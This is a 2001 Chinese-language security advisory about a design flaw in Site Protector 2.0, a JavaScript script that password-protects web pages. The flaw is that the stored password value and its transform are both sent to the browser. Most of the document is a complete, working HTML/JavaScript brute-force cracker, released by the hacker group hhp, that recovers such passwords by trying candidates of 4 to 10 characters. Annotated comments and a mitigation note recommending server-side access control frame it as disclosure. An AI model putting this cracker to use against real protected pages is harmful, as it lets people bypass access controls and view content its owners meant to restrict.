
Site Protector 存在密码可破解漏洞


发布时间:2001-10-09
更新时间:2001-10-09
严重程度:
威胁程度:口令恢复
错误类型:设计错误
利用方式:服务器模式

受影响系统
Site Protector version 2.0
详细描述
Site Protector(http://webdeveloper.earthweb.com/webjs/item/0,3602,12754_23741,00.html)是一个基于 JavaScript 的站点保护程序。其密码校验算法存在设计缺陷:加密后的密码和校验算法本身都随页面源码发送到客户端,攻击者可以据此在本地穷举,破解所使用的密码。

测试代码
<!--
Site Protector v2.0 password cracker.

Author: isox [isox@chainsawbeer.com]
Group: hhp [hhp-programming.net]
URL: 0xc0ffee [0xc0ffee.com]

---
Simply grab the source of the page using site protector and look for the following code at the bottom of the page:
password=new preferences('<encrypted password here>', 15, 0, 1);
That is your encrypted password =)

Have fun and be cool,
  isox
---
//-->


<html>
  <head>
  <title>Site Unprotector -- Written by isox -- http://hhp-programming.net</title>
  <Scr!pt>
  <!--




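// Page-level state shared by preferences(), mkasci() and themeat().
// Every name is declared with `var` so that none of them depends on
// implicit-global creation (which throws under strict mode).
var checkpass = '';   // stored, already-transformed password that candidates are compared with
var tell = 0;         // copy of preferences()'s `what` argument; not read elsewhere in this listing
var cracked = 0;      // set to 1 by themeat() when a candidate transforms to checkpass
var counttimes = 0;   // number of transform rounds applied to the current candidate
var disComp = 0;      // copy of preferences()'s `dis` argument; not read elsewhere in this listing
// Numeric constants mixed into every round by themeat().
var bases = [17, 33, 57, 101];
// Alphabet used both to index candidate characters and to emit the result:
// a fixed permutation of 0-9, A-Z, a-z and '_' (63 symbols).
var acharset = 'XYZNOhijkVWHIJ45ncdefMyzopqPQRSTUABKL6789ab_rs23CDEFGlmwtuvg01x';
var storeup = '';     // the candidate as first handed to mkasci() (round 0)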





/**
 * Constructor for the checker object that a protected page embeds.
 *
 * Copies its arguments into page-level globals and exposes mkasci() as the
 * instance's check() method. Note that the stored password and the round
 * count both arrive as plain arguments, i.e. they are visible in page source.
 *
 * @param {string} encryptpass  stored, already-transformed password
 * @param {number} encryptdepth round count; themeat() iterates while counttimes < times
 * @param {*} what saved in the global `tell`
 * @param {*} dis  saved in the global `disComp`
 */
function preferences(encryptpass, encryptdepth, what, dis) {
  // Start every check from round zero.
  counttimes = 0;
  // `orig` and `times` are not declared anywhere in this listing, so these
  // assignments create (or overwrite) globals.
  orig = '';
  times = encryptdepth;
  checkpass = encryptpass;
  tell = what;
  disComp = dis;
  this.check = mkasci;
}




/**
 * Translate a string into alphabet indexes and hand them to themeat().
 *
 * For each character of `orig` the position of that character in `acharset`
 * is stored at the same index of `ascival`; characters that do not occur in
 * the alphabet leave their slot unset.
 *
 * @param {string} orig candidate (round 0) or intermediate result (later rounds)
 */
function mkasci(orig) {
  // Keep the untransformed input when a fresh check starts.
  if (counttimes === 0) storeup = orig;

  // i, i1 and ascival are not declared in this listing, so they are globals.
  ascival = [];
  i = 0;
  while (i < orig.length) {
    var symbol = orig.charAt(i);
    // Inclusive bound: charAt(acharset.length) is '' and never equals a character.
    for (i1 = 0; i1 <= acharset.length; i1++) {
      if (acharset.charAt(i1) === symbol) {
        ascival[i] = i1;
      }
    }
    i++;
  }

  themeat(ascival);
}





/**
 * One round of the Site Protector password transform, plus the final compare.
 *
 * Takes the alphabet indexes produced by mkasci(), folds them into a single
 * number, turns the decimal digits of that number into characters of
 * `acharset`, and then either feeds the result back into mkasci() for another
 * round or, after `times` rounds, compares it with `checkpass`.
 *
 * NOTE(review): this is a home-made transform, not a vetted password hash.
 * Because the transform, the round count and the stored value all live in the
 * page, a guess can be verified entirely in the browser with no server
 * involved, which is the design error this advisory describes.
 *
 * @param {Array} basecode alphabet indexes of the current string (from mkasci)
 */
function themeat(basecode) {
  // Inputs shorter than 4 symbols are ignored entirely: nothing is compared.
  if(basecode.length >= 4) {
  counttimes++

  // newcode, finalcode and count are not declared here, so they are globals.
  newcode=0
  finalcode=1

  // Fold every position into finalcode. Each step mixes the current index
  // with two neighbouring entries and the constants in `bases`, rounds the
  // value with cutoff(), shifts it by bases[3] up or down depending on how it
  // compares with the middle entry, and multiplies it into the running value.
  for(count=0;count!=basecode.length;count++) {
  newcode = (basecode[(count<(basecode.length-1))?count+1:count-2]+(basecode[count]*bases[2])*(2.303)+basecode[Math.round(((basecode.length-1)*((Math.atan(basecode[(count!=0)?count-1:count+1])*basecode.length)+2*bases[0]))/100)]+1)
  newcode = cutoff(newcode)
  newcode = (newcode>basecode[Math.round(basecode.length/2)])?newcode-=bases[3]:newcode+=bases[3]
  finalcode = cutoff(((newcode/10)*finalcode)/(basecode.length-bases[0]))
  }

  var deconstruct=''
  // eval() is used here only to turn the number (finalcode + times) into a
  // string held in finalcode; the evaluated text is built from numbers only.
  eval('var finalcode="'+(finalcode+times)+'"');

  // Keep only the characters for which isNaN() is false, i.e. the digits;
  // signs, the decimal point and exponent letters are dropped.
  for(count=0;count<finalcode.length;count++) {
  if(!isNaN(finalcode.charAt(count))) {
    deconstruct = deconstruct+finalcode.charAt(count)
  }
  }

  finalcode = deconstruct
  var encrypt = new Array()

  // Walk the digit string two digits at a time. Each pair (leading '0'
  // removed) is scaled from the 0-99 range onto an index into acharset and
  // replaced by the character found there.
  for(count=2;count<finalcode.length+2;count+=2) {
  eval("encrypt["+((count/2)-1)+"]='"+((finalcode.charAt(count-2)!='0')?finalcode.charAt(count-2):'')+""+finalcode.charAt(count-1)+"'")
  encrypt[((count/2)-1)]=acharset.charAt(Math.round((acharset.length*encrypt[((count/2)-1)])/100))
  }

  encrypt=encrypt.join('')
  if(counttimes < times) {
  // More rounds to go: feed this round's output back in.
  mkasci(encrypt)
  } else {
  // Last round: reset the counter for the next check and compare.
  counttimes=0

  if(encrypt == checkpass) {
    cracked = 1;
  }
  }
  }
}





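/**
 * Round `code` to a reduced number of decimal places.
 *
 * The precision comes from the printed form of the number: with
 * d = String(code).length - String(Math.ceil(code)).length - 2,
 * the value is rounded to d decimal places, or to an integer when d <= 0.
 *
 * The conversion uses String() rather than eval(): for a number the resulting
 * text is the same, and no constructed source text is ever executed. All
 * working values are locals, so the function no longer creates globals.
 *
 * @param {number} code value to round
 * @returns {number} the rounded value
 */
function cutoff(code) {
  var asText = String(code);
  var ceilText = String(Math.ceil(code));
  var scale = Math.pow(10, asText.length - ceilText.length - 2);
  // Never scale down: a factor below 1 means "round to an integer".
  if (scale < 1) {
    scale = 1;
  }
  return Math.round(code * scale) / scale;
}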
//-->

</SCRIPT>
</head>

<body bgcolor="#000000" text="silver" link="silver" vlink="white">
<!--TRY HACKING THIS//-->
<CENTER>Site Unprotector<br>Author: <a href="http://0xc0ffee.com/">isox</a> [<a href="mailto:isox@chainsawbeer.com">isox@chainsawbeer.com</a>]</CENTER>
<br><br><br>
<p>Please wait while I attempt to crack this password...</p>
<br>

<SCR!PT>
// Stored (already transformed) password, as copied out of a protected page.
var encryptedpass = ''

// Ask again until at least 4 characters have been entered.
while(encryptedpass.length < 4) {
  encryptedpass = prompt("Enter Encrypted Password to Crack", "");
}


// Same arguments as the call quoted in the header comment of this listing:
// 15 transform rounds, what=0, dis=1. `password` is not declared, so it is a global.
password = new preferences(encryptedpass,15,0,1);
// Candidate currently being tested; holds the match once `cracked` is 1.
var foobar='';

// 4-character pass: four nested loops, one per character position.
// The three tests at the top of each loop skip the gaps in the code range, so
// a position takes codes 48-57, 65-90, 95 and 97-122 (0-9, A-Z, '_', a-z):
// 63 symbols, hence 63^4 = 15,752,961 candidates in this pass.
// Every level re-checks `cracked` so that all loops unwind after a match.
// Defender's reading: enumerating this space is only feasible because each
// guess is verified locally by password.check(); no server sees the attempts.
for(a=48; a<123; a++) {
  if(a == 58) {
  a = 65;
  }
  if(a == 91) {
  a = 95;
  }
  if(a == 96) {
  a = 97
  }

  for(b=48; b<123; b++) {
  if(b == 58) {
  b = 65;
  }
  if(b == 91) {
  b = 95;
  }
  if(b == 96) {
  b = 97
  }
  for(c=48; c<123; c++) {
  if(c == 58) {
    c = 65;
  }
  if(c == 91) {
    c = 95;
  }
  if(c == 96) {
    c = 97
  }
  for(d=48; d<123; d++) {
    if(d == 58) {
    d = 65;
    }
    if(d == 91) {
    d = 95;
    }
    if(d == 96) {
    d = 97
    }

    if(cracked == 1)
    break;

    foobar = String.fromCharCode(a, b, c, d);
    window.status = "Attempting to crack " + encryptedpass + ": " + foobar;
    password.check(foobar);
  }
  if(cracked == 1)
    break;
  }
  if(cracked == 1)
  break;
  }
  if(cracked == 1)
  break;
}


// 5-character pass: five nested loops, one per character position.
// Each position takes codes 48-57, 65-90, 95 and 97-122 (0-9, A-Z, '_', a-z);
// the tests at the top of each loop skip the gaps. 63 symbols, 63^5 candidates.
// If `cracked` is already 1 when this pass starts, the innermost test breaks
// at once and every outer level follows, so the pass is effectively skipped.
for(a=48; a<123; a++) {
  if(a == 58) {
  a = 65;
  }
  if(a == 91) {
  a = 95;
  }
  if(a == 96) {
  a = 97
  }

  for(b=48; b<123; b++) {
  if(b == 58) {
  b = 65;
  }
  if(b == 91) {
  b = 95;
  }
  if(b == 96) {
  b = 97
  }
  for(c=48; c<123; c++) {
  if(c == 58) {
    c = 65;
  }
  if(c == 91) {
    c = 95;
  }
  if(c == 96) {
    c = 97
  }
  for(d=48; d<123; d++) {
    if(d == 58) {
    d = 65;
    }
    if(d == 91) {
    d = 95;
    }
    if(d == 96) {
    d = 97
    }
    for(e=48; e<123; e++) {
    if(e == 58) {
    e = 65;
    }
    if(e == 91) {
    e = 95;
    }
    if(e == 96) {
    e = 97
    }

    if(cracked == 1)
    break;

    foobar = String.fromCharCode(a, b, c, d, e);
    window.status = "Attempting to crack " + encryptedpass + ": " + foobar;
    password.check(foobar);
    }

    if(cracked == 1)
    break;
  }

  if(cracked == 1)
    break;
  }

  if(cracked == 1)
  break;
  }

  if(cracked == 1)
  break;
}


// 6-character pass: six nested loops, one per character position.
// Each position takes codes 48-57, 65-90, 95 and 97-122 (0-9, A-Z, '_', a-z);
// the tests at the top of each loop skip the gaps. 63 symbols, 63^6 candidates.
// If `cracked` is already 1 when this pass starts, the innermost test breaks
// at once and every outer level follows, so the pass is effectively skipped.
for(a=48; a<123; a++) {
  if(a == 58) {
  a = 65;
  }
  if(a == 91) {
  a = 95;
  }
  if(a == 96) {
  a = 97
  }

  for(b=48; b<123; b++) {
  if(b == 58) {
  b = 65;
  }
  if(b == 91) {
  b = 95;
  }
  if(b == 96) {
  b = 97
  }
  for(c=48; c<123; c++) {
  if(c == 58) {
    c = 65;
  }
  if(c == 91) {
    c = 95;
  }
  if(c == 96) {
    c = 97
  }
  for(d=48; d<123; d++) {
    if(d == 58) {
    d = 65;
    }
    if(d == 91) {
    d = 95;
    }
    if(d == 96) {
    d = 97
    }
    for(e=48; e<123; e++) {
    if(e == 58) {
    e = 65;
    }
    if(e == 91) {
    e = 95;
    }
    if(e == 96) {
    e = 97
    }
    for(f=48; f<123; f++) {
    if(f == 58) {
      f = 65;
    }
    if(f == 91) {
      f = 95;
    }
    if(f == 96) {
      f = 97
    }

    if(cracked == 1)
      break;

    foobar = String.fromCharCode(a, b, c, d, e, f);
    window.status = "Attempting to crack " + encryptedpass + ": " + foobar;
    password.check(foobar);
    }

    if(cracked == 1)
    break;
    }

    if(cracked == 1)
    break;
  }

  if(cracked == 1)
    break;
  }

  if(cracked == 1)
  break;
  }

  if(cracked == 1)
  break;
}


// 7-character pass: seven nested loops, one per character position.
// Each position takes codes 48-57, 65-90, 95 and 97-122 (0-9, A-Z, '_', a-z);
// the tests at the top of each loop skip the gaps. 63 symbols, 63^7 candidates.
// If `cracked` is already 1 when this pass starts, the innermost test breaks
// at once and every outer level follows, so the pass is effectively skipped.
for(a=48; a<123; a++) {
  if(a == 58) {
  a = 65;
  }
  if(a == 91) {
  a = 95;
  }
  if(a == 96) {
  a = 97
  }

  for(b=48; b<123; b++) {
  if(b == 58) {
  b = 65;
  }
  if(b == 91) {
  b = 95;
  }
  if(b == 96) {
  b = 97
  }
  for(c=48; c<123; c++) {
  if(c == 58) {
    c = 65;
  }
  if(c == 91) {
    c = 95;
  }
  if(c == 96) {
    c = 97
  }
  for(d=48; d<123; d++) {
    if(d == 58) {
    d = 65;
    }
    if(d == 91) {
    d = 95;
    }
    if(d == 96) {
    d = 97
    }
    for(e=48; e<123; e++) {
    if(e == 58) {
    e = 65;
    }
    if(e == 91) {
    e = 95;
    }
    if(e == 96) {
    e = 97
    }
    for(f=48; f<123; f++) {
    if(f == 58) {
      f = 65;
    }
    if(f == 91) {
      f = 95;
    }
    if(f == 96) {
      f = 97
    }
    for(g=48; g<123; g++) {
      if(g == 58) {
      g = 65;
      }
      if(g == 91) {
      g = 95;
      }
      if(g == 96) {
      g = 97
      }

      if(cracked == 1)
      break;

      foobar = String.fromCharCode(a, b, c, d, e, f, g);
      window.status = "Attempting to crack " + encryptedpass + ": " + foobar;
      password.check(foobar);
    }

    if(cracked == 1)
      break;
    }

    if(cracked == 1)
    break;
    }

    if(cracked == 1)
    break;
  }

  if(cracked == 1)
    break;
  }

  if(cracked == 1)
  break;
  }

  if(cracked == 1)
  break;
}


// 8-character pass: eight nested loops, one per character position.
// Each position takes codes 48-57, 65-90, 95 and 97-122 (0-9, A-Z, '_', a-z);
// the tests at the top of each loop skip the gaps. 63 symbols, 63^8 candidates.
// If `cracked` is already 1 when this pass starts, the innermost test breaks
// at once and every outer level follows, so the pass is effectively skipped.
for(a=48; a<123; a++) {
  if(a == 58) {
  a = 65;
  }
  if(a == 91) {
  a = 95;
  }
  if(a == 96) {
  a = 97
  }

  for(b=48; b<123; b++) {
  if(b == 58) {
  b = 65;
  }
  if(b == 91) {
  b = 95;
  }
  if(b == 96) {
  b = 97
  }
  for(c=48; c<123; c++) {
  if(c == 58) {
    c = 65;
  }
  if(c == 91) {
    c = 95;
  }
  if(c == 96) {
    c = 97
  }
  for(d=48; d<123; d++) {
    if(d == 58) {
    d = 65;
    }
    if(d == 91) {
    d = 95;
    }
    if(d == 96) {
    d = 97
    }
    for(e=48; e<123; e++) {
    if(e == 58) {
    e = 65;
    }
    if(e == 91) {
    e = 95;
    }
    if(e == 96) {
    e = 97
    }
    for(f=48; f<123; f++) {
    if(f == 58) {
      f = 65;
    }
    if(f == 91) {
      f = 95;
    }
    if(f == 96) {
      f = 97
    }
    for(g=48; g<123; g++) {
      if(g == 58) {
      g = 65;
      }
      if(g == 91) {
      g = 95;
      }
      if(g == 96) {
      g = 97
      }
      for(h=48; h<123; h++) {
      if(h == 58) {
      h = 65;
      }
      if(h == 91) {
      h = 95;
      }
      if(h == 96) {
      h = 97
      }

      if(cracked == 1)
      break;

      foobar = String.fromCharCode(a, b, c, d, e, f, g, h);
      window.status = "Attempting to crack " + encryptedpass + ": " + foobar;
      password.check(foobar);
      }

      if(cracked == 1)
      break;
    }

    if(cracked == 1)
      break;
    }

    if(cracked == 1)
    break;
    }

    if(cracked == 1)
    break;
  }

  if(cracked == 1)
    break;
  }

  if(cracked == 1)
  break;
  }

  if(cracked == 1)
  break;
}


// 9-character pass: nine nested loops, one per character position.
// Each position takes codes 48-57, 65-90, 95 and 97-122 (0-9, A-Z, '_', a-z);
// the tests at the top of each loop skip the gaps. 63 symbols, 63^9 candidates.
// If `cracked` is already 1 when this pass starts, the innermost test breaks
// at once and every outer level follows, so the pass is effectively skipped.
for(a=48; a<123; a++) {
  if(a == 58) {
  a = 65;
  }
  if(a == 91) {
  a = 95;
  }
  if(a == 96) {
  a = 97
  }

  for(b=48; b<123; b++) {
  if(b == 58) {
  b = 65;
  }
  if(b == 91) {
  b = 95;
  }
  if(b == 96) {
  b = 97
  }
  for(c=48; c<123; c++) {
  if(c == 58) {
    c = 65;
  }
  if(c == 91) {
    c = 95;
  }
  if(c == 96) {
    c = 97
  }
  for(d=48; d<123; d++) {
    if(d == 58) {
    d = 65;
    }
    if(d == 91) {
    d = 95;
    }
    if(d == 96) {
    d = 97
    }
    for(e=48; e<123; e++) {
    if(e == 58) {
    e = 65;
    }
    if(e == 91) {
    e = 95;
    }
    if(e == 96) {
    e = 97
    }
    for(f=48; f<123; f++) {
    if(f == 58) {
      f = 65;
    }
    if(f == 91) {
      f = 95;
    }
    if(f == 96) {
      f = 97
    }
    for(g=48; g<123; g++) {
      if(g == 58) {
      g = 65;
      }
      if(g == 91) {
      g = 95;
      }
      if(g == 96) {
      g = 97
      }
      for(h=48; h<123; h++) {
      if(h == 58) {
      h = 65;
      }
      if(h == 91) {
      h = 95;
      }
      if(h == 96) {
      h = 97
      }
      for(i=48; i<123; i++) {
      if(i == 58) {
        i = 65;
      }
      if(i == 91) {
        i = 95;
      }
      if(i == 96) {
        i = 97
      }

      if(cracked == 1)
        break;

      foobar = String.fromCharCode(a, b, c, d, e, f, g, h, i);
      window.status = "Attempting to crack " + encryptedpass + ": " + foobar;
      password.check(foobar);
      }
      if(cracked == 1)
      break;
      }
      if(cracked == 1)
      break;
    }
    if(cracked == 1)
      break;
    }
    if(cracked == 1)
    break;
    }
    if(cracked == 1)
    break;
  }
  if(cracked == 1)
    break;
  }
  if(cracked == 1)
  break;
  }
  if(cracked == 1)
  break;
}


// 10-character pass: ten nested loops, one per character position.
// Each position takes codes 48-57, 65-90, 95 and 97-122 (0-9, A-Z, '_', a-z);
// the tests at the top of each loop skip the gaps. 63 symbols, 63^10 candidates.
// If `cracked` is already 1 when this pass starts, the innermost test breaks
// at once and every outer level follows, so the pass is effectively skipped.
for(a=48; a<123; a++) {
  if(a == 58) {
  a = 65;
  }
  if(a == 91) {
  a = 95;
  }
  if(a == 96) {
  a = 97
  }

  for(b=48; b<123; b++) {
  if(b == 58) {
  b = 65;
  }
  if(b == 91) {
  b = 95;
  }
  if(b == 96) {
  b = 97
  }
  for(c=48; c<123; c++) {
  if(c == 58) {
    c = 65;
  }
  if(c == 91) {
    c = 95;
  }
  if(c == 96) {
    c = 97
  }
  for(d=48; d<123; d++) {
    if(d == 58) {
    d = 65;
    }
    if(d == 91) {
    d = 95;
    }
    if(d == 96) {
    d = 97
    }
    for(e=48; e<123; e++) {
    if(e == 58) {
    e = 65;
    }
    if(e == 91) {
    e = 95;
    }
    if(e == 96) {
    e = 97
    }
    for(f=48; f<123; f++) {
    if(f == 58) {
      f = 65;
    }
    if(f == 91) {
      f = 95;
    }
    if(f == 96) {
      f = 97
    }
    for(g=48; g<123; g++) {
      if(g == 58) {
      g = 65;
      }
      if(g == 91) {
      g = 95;
      }
      if(g == 96) {
      g = 97
      }
      for(h=48; h<123; h++) {
      if(h == 58) {
      h = 65;
      }
      if(h == 91) {
      h = 95;
      }
      if(h == 96) {
      h = 97
      }
      for(i=48; i<123; i++) {
      if(i == 58) {
        i = 65;
      }
      if(i == 91) {
        i = 95;
      }
      if(i == 96) {
        i = 97
      }
      for(j=48; j<123; j++) {
        if(j == 58) {
        j = 65;
        }
        if(j == 91) {
        j = 95;
        }
        if(j == 96) {
        j = 97
        }

        if(cracked == 1)
        break;

        foobar = String.fromCharCode(a, b, c, d, e, f, g, h, i ,j);
        window.status = "Attempting to crack " + encryptedpass + ": " + foobar;
        password.check(foobar);
      }
      if(cracked == 1)
        break;
      }
      if(cracked == 1)
      break;
      }
      if(cracked == 1)
      break;
    }
    if(cracked == 1)
      break;
    }
    if(cracked == 1)
    break;
    }
    if(cracked == 1)
    break;
  }
  if(cracked == 1)
    break;
  }
  if(cracked == 1)
  break;
  }
  if(cracked == 1)
  break;
}

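// Report the outcome of the search.
// checkpass is whatever was typed into prompt(), so it is inserted into the
// page as a text node instead of being written as markup; the message also
// gains the space that was missing between the value and "has".
if (cracked == 1) {
  var successMessage = checkpass + " has been successfully cracked. The magic word is: " + foobar;
  alert(successMessage);
  document.body.appendChild(document.createElement("br"));
  document.body.appendChild(document.createTextNode(successMessage));
  window.status = "Password has been successfully cracked";
} else {
  alert("I was unable to crack " + checkpass);
}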
</SCRIPT>
</body>

</HTML>
(NOTE: The letter 'I' used inside SCRIPT Tags has been replaced with '!')

解决方案
尚无。由于校验算法和加密后的密码都位于客户端页面中,在有修复之前不应依赖该程序保护敏感内容,应改用服务器端的访问控制。

相关信息
isox at chainsawbeer.com